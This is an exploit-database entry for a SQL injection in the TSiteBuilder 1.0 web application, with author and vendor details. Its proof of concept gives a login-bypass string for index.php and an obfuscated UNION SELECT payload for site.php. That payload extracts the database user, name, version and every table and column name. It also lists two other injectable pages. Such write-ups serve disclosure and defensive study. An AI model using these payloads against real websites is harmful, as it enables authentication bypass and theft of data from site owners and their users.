TSiteBuilder 1.0 - SQL Injection

2018-01-28 02:05:11

# # # # #
# Exploit Title: TSiteBuilder 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/website/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php
#
# User: ' OR 1 -- - Pass: anything
#
# 2)
# http://localhost/[PATH]/site.php?id=[SQL]
#
# -364' /*!08888UNION*/(/*!08888SELECT*/ 0x3078323833313239,0x283229,/*!08888CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x494853414e2053454e43414e,(/*!08888Select*/ export_set(5,@:=0,(/*!08888select*/ count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x3078323833363239,0x283729,0x283829)-- -
#
# 3)
# http://localhost/[PATH]/pagelist.php?id=[SQL]
#
# 4)
# http://localhost/[PATH]/page_new.php?id=[SQL]
#
# # # # #

Fixes

No fixes

In order to submit a new fix you need to be registered.